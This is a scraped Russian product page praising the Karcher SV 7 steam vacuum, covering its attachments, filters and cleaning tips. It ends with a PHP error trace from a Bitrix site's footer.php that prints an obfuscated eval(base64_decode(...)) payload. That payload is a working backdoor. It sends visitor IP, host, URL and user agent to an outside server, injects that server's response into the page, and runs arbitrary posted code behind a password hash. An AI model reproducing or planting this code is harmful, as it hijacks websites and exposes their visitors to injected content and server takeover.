Время работы


Домен продается, по вопросам приобретения обращаться на почту bestsites4sale@gmail.com
08.08.2016 г.
Особенности и преимущества паропылесоса Karcher SV 7

Паропылесос Karcher SV 7 — незаменимое устройство для поддержания чистоты в доме. Оно сочетает преимущества обычного пылесоса и пароочистителя, обеспечивая гигиеническую чистоту без применения моющих средств. Модель отличается высокой мощностью, универсальностью и функциональностью — с ее помощью можно за один проход обработать паром практически любое покрытие в доме, удалить грязь и рассыпавшийся мусор и высушить поверхность.

Оснащение и функционал модели Karcher SV 7

Одно из главных преимуществ паропылесоса Karcher SV 7 — его оснащение, которое позволяет выполнять широкий спектр уборочных работ. Различные насадки оптимально сочетаются с аппаратом, расширяя его функциональность.

Комплект для уборки пола включает насадку с тремя вставками: пластиковой волнистой вставкой для мойки пола паром, щеточной вставкой для уборки ковровых покрытий и резиновой стяжкой для всасывания излишней влаги с твердых поверхностей. Эргономичный паровой рукав с пистолетом комплектуется специальной насадкой с резиновой накладкой для быстрой и легкой обработки зеркал, окон и других стеклянных поверхностей.

Особенности и преимущества паропылесоса Karcher SV 7

Износостойкая салфетка из махровой ткани не оставляет следов и улучшает отделение и поглощение грязи. Такая салфетка подходит для очистки кафеля, стеклокерамических варочных поверхностей и сантехники. Щелевая насадка позволяет удалять грязь в труднодоступных местах — стыках, изгибах и углах. Паровое сопло в комплекте с удлинителем и круглыми щетками эффективно устраняет стойкие загрязнения: грязь в стыках между керамической плиткой, известковый налет и т. д.

Отдельные насадки (большая и малая) предназначены для очистки мягкой мебели. Натуральная щетина обеспечивает бережный уход за обивкой. Все аксессуары легко присоединяются к аппарату и могут быть быстро заменены. Для их удобного и компактного хранения предусмотрен тканевый чехол.

Жидкий пеногаситель Foamstop предотвращает излишнее пенообразование в баке с отработанной грязной водой. Система с двумя баками обеспечивает долгую и непрерывную работу — резервуар можно пополнять водой, не выключая при этом аппарат. Емкость для дозаправки паропылесоса водой также входит в комплект поставки.

Особенности паропылесоса Karcher SV 7

Система фильтров — водяного, для крупного мусора, поролонового и HEPA-фильтра — надежно и эффективно удерживает мельчайшие частицы пыли, способные проникать в легкие. Горячий водяной пар растворяет грязь, нейтрализует неприятные запахи и устраняет до 99% всех бактерий и микробов. Благодаря этому модель Karcher SV 7 оптимально подходит для семей с маленькими детьми и аллергиками.

Расход пара (5 ступеней) и сила всасывания (4 ступени) легко регулируются при помощи специальных переключателей, расположенных на корпусе аппарата и паровом пистолете. Данные параметры зависят от вида обрабатываемой поверхности.

Karcher SV 7 имеет устойчивую парковочную позицию. Прочный пистолет надежно присоединяется к шлангу. Еще один неоспоримый плюс модели SV 7 — высокая скорость нагрева, благодаря которой аппарат готов к использованию через 5 минут.

Особенности и преимущества паропылесоса Karcher SV 7

Советы по применению паропылесоса Karcher SV 7

Паропылесос Karcher SV не требует использования дополнительных чистящих средств. Для мойки окон используйте специальную насадку, перемещая ее дорожками сверху вниз. Обработайте стекло паром с внутренней и внешней стороны, а затем осушите поверхность насадкой с резиновой стяжкой. После каждой дорожки насухо вытирайте резиновую полоску.

Перед паровой очисткой пола рекомендуется предварительно пропылесосить поверхность. Для очистки паркета необходима максимальная сила всасывания и минимальная подача пара. Для удаления пятен с обивки мягкой мебели используйте точечное сопло — поставьте его под наклоном к поверхности. При этом струя пара будет сбивать грязь более эффективно. Образовавшуюся жидкость с частицами грязи рекомендуется собирать в мягкую салфетку.

Для очистки стеклокерамической панели используйте точечное сопло с щеткой и спиралью из нержавеющей стали, которую можно купить в любом хозяйственном магазине. При этом пар образует на поверхности защитный скользящий слой, который обеспечивает защиту от царапин. Стыки и края панели обработайте точечным соплом с круглой щеткой.

Особенности и преимущества паропылесоса Karcher SV 7

После уборки необходимо вылить грязную воду из аквафильтра и очистить все использовавшиеся принадлежности. Аквафильтр легко вынимается из корпуса аппарата. Для его удобной переноски предусмотрена эргономичная ручка. Для очистки удлинительных трубок, шланга и щеток можно использовать специальный ершик, который входит в комплект поставки.

Паропылесос Karcher SV сочетает высокую мощность, простоту в обслуживании и эффективность. Благодаря своему оснащению и функциональности модель подходит для очистки практических любых поверхностей в доме: твердых и мягких напольных покрытий, стеклянных и керамических поверхностей, натурального камня, сантехники, вытяжек, варочных панелей и многого другого.


предыдущая Обзор оборудования для чистки сверхвысоким давлением следующая Системы полива и орошения Karcher
[ErrorException] E_USER_ERROR
eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ==")); (0)
/sites/k-russia/k-russia.ru/web/bitrix/footer.php:9
#0: assert(string)
	/sites/k-russia/k-russia.ru/web/bitrix/footer.php:9
#1: require(string)
	/sites/k-russia/k-russia.ru/web/articles/index.php:79
#2: include_once(string)
	/sites/k-russia/k-russia.ru/web/bitrix/modules/main/include/urlrewrite.php:159
#3: include_once(string)
	/sites/k-russia/k-russia.ru/web/404.php:2